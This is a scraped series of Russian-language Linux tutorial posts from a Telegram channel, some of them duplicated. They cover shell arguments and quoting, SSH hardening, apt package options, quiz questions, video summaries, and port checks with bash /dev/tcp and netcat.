umbrella_corp_options в двойных кавычках. Это позволяет передавать параметры с пробелами, как единое целое.Пример использования:
Если ты вызовешь:
./someScript.sh foo bar "boo far"
то
$@ в двойных кавычках будет содержать три аргумента: "foo", "bar" и "boo far".Использование
$@ в shell скриптах позволяет легко и безопасно передавать параметры, включая те, которые содержат пробелы. Попробуй сам и убедись, насколько это удобно!🌳 Ветка: https://stackoverflow.com/questions/9994295/what-does-mean-in-a-shell-noscript
📩 Завтра: Защити свой сервер: Настройка безопасности SSH на Linux
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Текстовый редактор Nano — как работать с файлами на минималках и не страдать!
🧠 - Почувствуй себя цифровым рентгенологом — откроем файлы насквозь с Od!
🧠 - Давно занимался спортом? Нет? Ну вот, пора хотя бы пароли сменить!
#stackoverflow @LinuxSkill #Linux #ShellScripting #SysAdmin #DevOps
Stack Overflow
What does $@ mean in a shell noscript?
What does a dollar sign followed by an at-sign (@) mean in a shell noscript?
For example:
umbrella_corp_options $@
For example:
umbrella_corp_options $@
👍18🔥2
🔒 Защити свой сервер: Настройка безопасности SSH на Linux
Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе, как настроить безопасность SSH соединения на твоем сервере. Это важный шаг для защиты от несанкционированного доступа. Давай разберемся, как это сделать!
Подготовка:
1. Настройка SSH авторизации по сертификатам:
- Убедись, что ты уже авторизуешься на серверах через сертификаты SSH.
2. Бэкап конфигурации:
Основные настройки:
1. Жестко прописываем IP адрес SSH сервера:
2. Изменяем порт SSH сервера:
3. Включаем только протокол второй версии:
4. Ограничиваем время и количество попыток авторизации:
5. Включаем разделение прав пользователей:
6. Ограничиваем список доступа по SSH:
7. Отключаем пустые пароли и доверенные хосты:
Проверка и завершение:
1. Перезапуск SSH сервера:
2. Проверка подключения через Putty:
- Убедись, что можешь подключиться с админской машины с помощью сертификата.
3. Ограничение IP адресов:
- Добавь IP адреса всех участников локальной сети.
4. Проверка авторизации по паролю:
- Убедись, что
5. Перезагрузка хостов:
- Если что-то пошло не так, восстанови конфигурацию из бэкапа:
Теперь твой сервер защищен, и ты можешь быть уверен в безопасности своих данных. Радуйся, ведь теперь напакостить по SSH сможешь только ты сам!
📩 Завтра:
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Секреты qemu-img, которые сэкономят твой диск
🧠 - Забудь про файлы, они исчезнут
🧠 - Наконец-то! Как стать суперпользователем без риска оказаться в тюрьме!
#Linux_Mastery @LinuxSkill
Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе, как настроить безопасность SSH соединения на твоем сервере. Это важный шаг для защиты от несанкционированного доступа. Давай разберемся, как это сделать!
Подготовка:
1. Настройка SSH авторизации по сертификатам:
- Убедись, что ты уже авторизуешься на серверах через сертификаты SSH.
2. Бэкап конфигурации:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bkp
Основные настройки:
1. Жестко прописываем IP адрес SSH сервера:
ListenAddress 192.168.1.100 # ip ag-dc-1
ListenAddress 192.168.1.101 # ip ag-dc-2
2. Изменяем порт SSH сервера:
Port 54322
3. Включаем только протокол второй версии:
Protocol 2
4. Ограничиваем время и количество попыток авторизации:
LoginGraceTime 10s
MaxAuthTries 2
5. Включаем разделение прав пользователей:
UsePrivilegeSeparation yes
6. Ограничиваем список доступа по SSH:
AllowUsers adminguideru root@192.168.1.100 root@192.168.1.101
7. Отключаем пустые пароли и доверенные хосты:
PermitEmptyPasswords no
IgnoreRhosts yes
HostbasedAuthentication no
Проверка и завершение:
1. Перезапуск SSH сервера:
sudo systemctl restart ssh sshd
2. Проверка подключения через Putty:
- Убедись, что можешь подключиться с админской машины с помощью сертификата.
3. Ограничение IP адресов:
sudo nano /etc/hosts.allow
- Добавь IP адреса всех участников локальной сети.
4. Проверка авторизации по паролю:
sudo nano /etc/ssh/sshd_config
- Убедись, что
PasswordAuthentication установлено в no.5. Перезагрузка хостов:
- Если что-то пошло не так, восстанови конфигурацию из бэкапа:
sudo cp /etc/ssh/sshd_config.bkp /etc/ssh/sshd_config
Теперь твой сервер защищен, и ты можешь быть уверен в безопасности своих данных. Радуйся, ведь теперь напакостить по SSH сможешь только ты сам!
📩 Завтра:
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Секреты qemu-img, которые сэкономят твой диск
🧠 - Забудь про файлы, они исчезнут
🧠 - Наконец-то! Как стать суперпользователем без риска оказаться в тюрьме!
#Linux_Mastery @LinuxSkill
Telegram
Linux Skill - Освой Linux c нуля до DevOps
Секреты qemu-img, которые сэкономят твой диск 💾🔄
Знаешь, что общее у меня и твоего жесткого диска? Мы оба храним слишком много бесполезных вещей. 😏
Сегодня покажу, как qemu-img делает управление виртуальными дисками в Linux проще простого. Этот инструмент…
Знаешь, что общее у меня и твоего жесткого диска? Мы оба храним слишком много бесполезных вещей. 😏
Сегодня покажу, как qemu-img делает управление виртуальными дисками в Linux проще простого. Этот инструмент…
👍24🔥1
🛠️ Избавься от лишнего: Как установить только нужные пакеты в Linux
Привет, линукс-мастер! Сегодня я расскажу тебе, как избежать установки ненужных пакетов, когда ты ставишь софт через
Проблема с Recommended packages:
Когда ты устанавливаешь программу, например, Midnight Commander (
- Вместе с
Как избежать установки "паразитов":
Чтобы установить только необходимые пакеты, используй флаг
- Это установит только
Как глобально отключить Recommended packages:
1. Создай файл
2. Вставь в него:
Теперь
Как установить рекомендованные пакеты для конкретного случая:
Если тебе все-таки нужны рекомендованные пакеты для конкретной программы, используй:
Теперь ты знаешь, как контролировать установку пакетов и избегать лишнего. Пользуйся на здоровье и делись своими успехами! 🥳
📩 Завтра: Вопрос №12 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Забудь про начало! Как Tac покажет тебе всё важное с последней строки
🧠 - Не знал про эту команду? Вот как uname спасет твой Linux!
🧠 - Ты точно в курсе всех файлов? Vdir покажет больше, чем ты ожидал!
#Linux_Mastery @LinuxSkill
Привет, линукс-мастер! Сегодня я расскажу тебе, как избежать установки ненужных пакетов, когда ты ставишь софт через
apt. Эти "паразиты" могут тянуть за собой кучу лишнего, но я покажу, как от них избавиться. Давай разберемся!Проблема с Recommended packages:
Когда ты устанавливаешь программу, например, Midnight Commander (
mc), вместе с ней могут устанавливаться дополнительные пакеты, которые не всегда нужны:apt install mc
- Вместе с
mc могут установиться mailcap и unzip, которые не обязательны для работы программы.Как избежать установки "паразитов":
Чтобы установить только необходимые пакеты, используй флаг
--no-install-recommends:apt install mc --no-install-recommends
- Это установит только
libssh2-1, mc, и mc-data, без лишних пакетов.Как глобально отключить Recommended packages:
1. Создай файл
/etc/apt/apt.conf.d/99norecommends:sudo nano /etc/apt/apt.conf.d/99norecommends
2. Вставь в него:
APT::Install-Recommends "false";
Теперь
apt не будет устанавливать рекомендованные пакеты по умолчанию.Как установить рекомендованные пакеты для конкретного случая:
Если тебе все-таки нужны рекомендованные пакеты для конкретной программы, используй:
apt-get install mc --install-recommends
Теперь ты знаешь, как контролировать установку пакетов и избегать лишнего. Пользуйся на здоровье и делись своими успехами! 🥳
📩 Завтра: Вопрос №12 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Забудь про начало! Как Tac покажет тебе всё важное с последней строки
🧠 - Не знал про эту команду? Вот как uname спасет твой Linux!
🧠 - Ты точно в курсе всех файлов? Vdir покажет больше, чем ты ожидал!
#Linux_Mastery @LinuxSkill
Telegram
Linux Skill - Освой Linux c нуля до DevOps
Забудь про начало! Как Tac покажет тебе всё важное с последней строки 🔄📖
Честно говоря, если бы читать было так же просто, как катить файл в терминале, книги начинались бы с последней страницы. Сегодня разберём команду Tac — это тот момент, когда твои логи…
Честно говоря, если бы читать было так же просто, как катить файл в терминале, книги начинались бы с последней страницы. Сегодня разберём команду Tac — это тот момент, когда твои логи…
👍30🔥6
Вопрос №12 из теста Linux Essentials Certification: Какая команда покажет сообщения времени загрузки системы?
Anonymous Quiz
5%
echo
3%
messages
7%
lspci
41%
dmesg
44%
display system boot
🔥11
Media is too big
VIEW IN TELEGRAM
🎥 Производительность Nginx против Traefik: кто победит?
В этом видео мы сравниваем два популярных обратных прокси-сервера — Nginx и Traefik. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.
1. Введение и цели тестирования (00:00):
- Сравнение Nginx и Traefik в качестве обратных прокси.
- Измерение задержки, доступности, загрузки процессора, памяти и сетевого трафика.
2. Инфраструктура и развертывание (00:53):
- Использование семи больших и четырех средних экземпляров для развертывания прокси и приложений.
- Создание кластера EKS для мониторинга и генерации нагрузки.
3. Функции обратного прокси-сервера (01:17):
- Балансировка нагрузки и динамическое масштабирование приложений.
- Возможность обновления приложений без простоев.
4. Преимущества и недостатки Nginx и Traefik (03:15):
- Nginx требует времени для настройки и оптимизации.
- Traefik имеет встроенные механизмы обнаружения сервисов и упрощает управление сертификатами.
5. Тестирование и настройка (05:44):
- Использование последних версий Nginx и Traefik.
- Включение журналов доступа и настройка прокси-серверов.
6. Результаты тестирования (08:04):
- Nginx поддерживает меньшую задержку и потребляет меньше ЦП.
- Traefik достигает 100% загрузки процессора быстрее, чем Nginx.
7. Заключение (10:14):
- Nginx обрабатывает больше запросов и потребляет больше ЦП.
- Задержка Nginx остается стабильной, в отличие от Traefik.
8. Использование памяти и частота ошибок (11:41):
- Traefik кэширует больше запросов, что объясняет задержку.
- Nginx отбрасывает несколько запросов для низкой задержки.
Оба сервера имеют свои преимущества и недостатки. Nginx обеспечивает стабильную задержку и лучше справляется с нагрузкой, в то время как Traefik предлагает удобство в управлении и настройке. Выбор зависит от ваших потребностей и предпочтений.
Источник: https://www.youtube.com/watch?v=42RNqGdpELE
📩 Завтра: Вопрос №14 из теста Linux Essentials Certification:
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Ты точно знаешь, кто ты? Whoami расскажет!
🧠 - Ускорь работу в Linux на 200% с помощью команды xargs
🧠 - Хочешь сэкономить время? Вот как Yes скажет "да" за тебя
#Linux_youtube @LinuxSkill #Linux #Nginx #Traefik #Performance #SysAdmin #DevOps
В этом видео мы сравниваем два популярных обратных прокси-сервера — Nginx и Traefik. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.
1. Введение и цели тестирования (00:00):
- Сравнение Nginx и Traefik в качестве обратных прокси.
- Измерение задержки, доступности, загрузки процессора, памяти и сетевого трафика.
2. Инфраструктура и развертывание (00:53):
- Использование семи больших и четырех средних экземпляров для развертывания прокси и приложений.
- Создание кластера EKS для мониторинга и генерации нагрузки.
3. Функции обратного прокси-сервера (01:17):
- Балансировка нагрузки и динамическое масштабирование приложений.
- Возможность обновления приложений без простоев.
4. Преимущества и недостатки Nginx и Traefik (03:15):
- Nginx требует времени для настройки и оптимизации.
- Traefik имеет встроенные механизмы обнаружения сервисов и упрощает управление сертификатами.
5. Тестирование и настройка (05:44):
- Использование последних версий Nginx и Traefik.
- Включение журналов доступа и настройка прокси-серверов.
6. Результаты тестирования (08:04):
- Nginx поддерживает меньшую задержку и потребляет меньше ЦП.
- Traefik достигает 100% загрузки процессора быстрее, чем Nginx.
7. Заключение (10:14):
- Nginx обрабатывает больше запросов и потребляет больше ЦП.
- Задержка Nginx остается стабильной, в отличие от Traefik.
8. Использование памяти и частота ошибок (11:41):
- Traefik кэширует больше запросов, что объясняет задержку.
- Nginx отбрасывает несколько запросов для низкой задержки.
Оба сервера имеют свои преимущества и недостатки. Nginx обеспечивает стабильную задержку и лучше справляется с нагрузкой, в то время как Traefik предлагает удобство в управлении и настройке. Выбор зависит от ваших потребностей и предпочтений.
Источник: https://www.youtube.com/watch?v=42RNqGdpELE
📩 Завтра: Вопрос №14 из теста Linux Essentials Certification:
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Ты точно знаешь, кто ты? Whoami расскажет!
🧠 - Ускорь работу в Linux на 200% с помощью команды xargs
🧠 - Хочешь сэкономить время? Вот как Yes скажет "да" за тебя
#Linux_youtube @LinuxSkill #Linux #Nginx #Traefik #Performance #SysAdmin #DevOps
👍6
Вопрос №14 из теста Linux Essentials Certification: Какая команда отобразит последнюю строку файла foo.txt?
Anonymous Quiz
17%
last -n 1 foo.txt
3%
head -n foo.txt
12%
tail foo.txt
68%
tail -n 1 foo.txt
👍14🔥2
Media is too big
VIEW IN TELEGRAM
🎥 Как уменьшить размер образа Docker: от 1,2 ГБ до 10 МБ
В этом видео мы расскажем, как оптимизировать образы Docker, чтобы сократить их размер и повысить эффективность. Узнай, как это влияет на стоимость хранения, сроки развертывания и безопасность.
1. Введение и важность уменьшения размера (00:00):
- Уменьшение размера образа Docker с 1,2 ГБ до 10 МБ.
- Советы применимы к любым образам Docker.
2. Выбор базового изображения (00:15):
- Использование образа Alpine для сокращения размера.
- Alpine содержит только необходимые компоненты для запуска приложений.
3. Кэширование слоев (01:40):
- Кэширование слоев для ускорения сборки.
- Оптимизация файла Docker для использования кэширования.
4. Удаление ненужных файлов (03:05):
- Использование Docker Ignore для удаления ненужных файлов.
- Важность очистки кэша и удаления временных файлов.
5. Многоэтапная сборка (05:27):
- Использование многоэтапной сборки для оптимизации размера образа.
- Пример с разделением процесса сборки на этапы.
6. Инструменты для оптимизации Docker (06:26):
- Использование инструментов, таких как Dive и Slim, для оптимизации и отладки сборок.
- Slim позволяет уменьшить размер образа до 30 раз.
Оптимизация образов Docker — это ключ к эффективному управлению ресурсами и повышению безопасности. Применяйте эти советы и инструменты, чтобы улучшить свои Docker-сборки!
📩 Завтра: Когда нужно оборачивать переменные в кавычки в shell скрипте?
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Не трать время на распаковку! Вот как Zcat покажет всё на лету!
🧠 - Ускоряем загрузку Linux: Разбираемся с systemd-analyze
🧠 - Как использовать команду awk в Linux: обработка текста в пару команд
#Linux_youtube @LinuxSkill #Docker #Optimization #SysAdmin #DevOps
В этом видео мы расскажем, как оптимизировать образы Docker, чтобы сократить их размер и повысить эффективность. Узнай, как это влияет на стоимость хранения, сроки развертывания и безопасность.
1. Введение и важность уменьшения размера (00:00):
- Уменьшение размера образа Docker с 1,2 ГБ до 10 МБ.
- Советы применимы к любым образам Docker.
2. Выбор базового изображения (00:15):
- Использование образа Alpine для сокращения размера.
- Alpine содержит только необходимые компоненты для запуска приложений.
3. Кэширование слоев (01:40):
- Кэширование слоев для ускорения сборки.
- Оптимизация файла Docker для использования кэширования.
4. Удаление ненужных файлов (03:05):
- Использование Docker Ignore для удаления ненужных файлов.
- Важность очистки кэша и удаления временных файлов.
5. Многоэтапная сборка (05:27):
- Использование многоэтапной сборки для оптимизации размера образа.
- Пример с разделением процесса сборки на этапы.
6. Инструменты для оптимизации Docker (06:26):
- Использование инструментов, таких как Dive и Slim, для оптимизации и отладки сборок.
- Slim позволяет уменьшить размер образа до 30 раз.
Оптимизация образов Docker — это ключ к эффективному управлению ресурсами и повышению безопасности. Применяйте эти советы и инструменты, чтобы улучшить свои Docker-сборки!
📩 Завтра: Когда нужно оборачивать переменные в кавычки в shell скрипте?
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Не трать время на распаковку! Вот как Zcat покажет всё на лету!
🧠 - Ускоряем загрузку Linux: Разбираемся с systemd-analyze
🧠 - Как использовать команду awk в Linux: обработка текста в пару команд
#Linux_youtube @LinuxSkill #Docker #Optimization #SysAdmin #DevOps
👍12🔥1
🧠 Нужно ли ставить кавычки вокруг переменных в shell-скриптах?
Привет, повелитель терминала! Если ты в скриптах пишешь
Давай разберёмся, когда и зачем переменные в shell-скриптах нужно оборачивать в кавычки.
### Общее правило:
> Оборачивай переменные в двойные кавычки, если не хочешь сюрпризов от пробелов, пустых значений и спецсимволов.
---
### Когда кавычки обязательны:
1. Значение может быть пустым:
2. Есть пробелы:
3. В переменной спецсимволы (
---
### Пример бага:
---
### Когда кавычки можно опустить:
-
- Внутри арифметических или логических выражений:
Вывод:
Используй кавычки по умолчанию. Это просто и защищает от десятков потенциальных багов.
🌳 Ветка: https://stackoverflow.com/questions/10067266/when-to-wrap-quotes-around-a-shell-variable
📩 Завтра: Секреты Bash: Как тестировать порты без curl и wget!
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Откройте для себя мир Управления Службами в Linux с нашей серией статей
🧠 - Контейнер в контейнере? Да это как матрёшка для айтишников: открываешь, а там ещё больше проблем… но зато все свои!
🧠 - Секретная Команда nsenter! Управляй Контейнерами как Хакер
#stackoverflow @LinuxSkill #Linux #ShellScripting #Quotes #SysAdmin #DevOps
Привет, повелитель терминала! Если ты в скриптах пишешь
$var без кавычек — скорее всего, ты (пока что) просто везучий. Давай разберёмся, когда и зачем переменные в shell-скриптах нужно оборачивать в кавычки.
### Общее правило:
> Оборачивай переменные в двойные кавычки, если не хочешь сюрпризов от пробелов, пустых значений и спецсимволов.
---
### Когда кавычки обязательны:
1. Значение может быть пустым:
[ "$var" = "value" ]
2. Есть пробелы:
xdg-open "$URL"
3. В переменной спецсимволы (
*, &, ?): wget "$link"
---
### Пример бага:
file="My documents/report.pdf"
rm $file # ❌ Попытка удалить два файла: 'My' и 'documents/report.pdf'
rm "$file" # ✅ Удаляется нужный файл
---
### Когда кавычки можно опустить:
-
$?, $#, $0 — безопасны без кавычек.- Внутри арифметических или логических выражений:
if [ "$?" -eq 0 ]; then ...
Вывод:
Используй кавычки по умолчанию. Это просто и защищает от десятков потенциальных багов.
🌳 Ветка: https://stackoverflow.com/questions/10067266/when-to-wrap-quotes-around-a-shell-variable
📩 Завтра: Секреты Bash: Как тестировать порты без curl и wget!
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Откройте для себя мир Управления Службами в Linux с нашей серией статей
🧠 - Контейнер в контейнере? Да это как матрёшка для айтишников: открываешь, а там ещё больше проблем… но зато все свои!
🧠 - Секретная Команда nsenter! Управляй Контейнерами как Хакер
#stackoverflow @LinuxSkill #Linux #ShellScripting #Quotes #SysAdmin #DevOps
Stack Overflow
When to wrap quotes around a shell variable?
Should or should I not wrap quotes around variables in a shell noscript?
For example, is the following correct:
xdg-open $URL
[ $? -eq 2 ]
or
xdg-open "$URL"
[ "$?" -eq "2&q...
For example, is the following correct:
xdg-open $URL
[ $? -eq 2 ]
or
xdg-open "$URL"
[ "$?" -eq "2&q...
👍14
🚀 Секреты Bash: Как тестировать порты без curl и wget!
Привет, линукс-мастер! Сегодня я расскажу тебе, как тестировать TCP/UDP порты без использования привычных утилит вроде curl или wget. Это особенно полезно в средах, где их нет, например, в Docker-контейнерах. Давай разберемся, как это сделать с помощью Bash!
Проверка портов с Bash:
1. Проверка открытых портов:
- Если порт открыт, команда завершится без вывода. Статус можно проверить через
2. Добавление таймаута:
- Таймаут в 5 секунд поможет избежать долгого ожидания.
3. Что такое
- Это сокращенная версия команды
4. Отправка UDP запросов:
- Синтаксис:
5. Получение времени с NIST Time Server:
- Аналогично можно получить время с других NTP серверов.
6. Использование
-
Эти методы помогут тебе тестировать порты без сторонних утилит. Пользуйся на здоровье и увидимся в следующем посте!
📩 Завтра: Как правильно зачистить логи Nginx: Избегай ошибок
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Настрой автосборку RAID с MDADM и забудь о проблемах с дисками
🧠 - Секреты команды cd: автоматизация и удобство в одном флаконе
🧠 - Сделай свои файлы неуязвимыми с командой chattr
#Linux_Mastery @LinuxSkill #Bash #curl #wget
Привет, линукс-мастер! Сегодня я расскажу тебе, как тестировать TCP/UDP порты без использования привычных утилит вроде curl или wget. Это особенно полезно в средах, где их нет, например, в Docker-контейнерах. Давай разберемся, как это сделать с помощью Bash!
Проверка портов с Bash:
1. Проверка открытых портов:
:> /dev/tcp/yourdomain.com/80
:> /dev/tcp/yourdomain.com/443
- Если порт открыт, команда завершится без вывода. Статус можно проверить через
echo $?.2. Добавление таймаута:
timeout 5s bash -c ':> /dev/tcp/yourdomain.com/80'
timeout 5s bash -c ':> /dev/tcp/yourdomain.com/443'
- Таймаут в 5 секунд поможет избежать долгого ожидания.
3. Что такое
:>?- Это сокращенная версия команды
true, которая всегда возвращает успешный код.4. Отправка UDP запросов:
:> /dev/udp/localhost/8888
- Синтаксис:
/dev/протокол/хост/порт.5. Получение времени с NIST Time Server:
cat </dev/tcp/time.nist.gov/13
- Аналогично можно получить время с других NTP серверов.
6. Использование
nc для проверки портов:nc -zv yourdomain.com 80
-
nc или netcat позволяет быстро проверить порты с выводом результата.Эти методы помогут тебе тестировать порты без сторонних утилит. Пользуйся на здоровье и увидимся в следующем посте!
📩 Завтра: Как правильно зачистить логи Nginx: Избегай ошибок
Включи 🔔 чтобы не пропустить!
____________________
Дополнительный материал:
🧠 - Настрой автосборку RAID с MDADM и забудь о проблемах с дисками
🧠 - Секреты команды cd: автоматизация и удобство в одном флаконе
🧠 - Сделай свои файлы неуязвимыми с командой chattr
#Linux_Mastery @LinuxSkill #Bash #curl #wget
Telegram
Linux Skill - Освой Linux c нуля до DevOps
Настрой автосборку RAID с MDADM и забудь о проблемах с дисками
RAID — это как страховка: о ней редко задумываешься, пока что-то не пойдет не так. Давай настроим её правильно и надёжно с MDADM.
Основная информация и код:
### Настройка автосборки RAID с…
RAID — это как страховка: о ней редко задумываешься, пока что-то не пойдет не так. Давай настроим её правильно и надёжно с MDADM.
Основная информация и код:
### Настройка автосборки RAID с…
👍25🔥7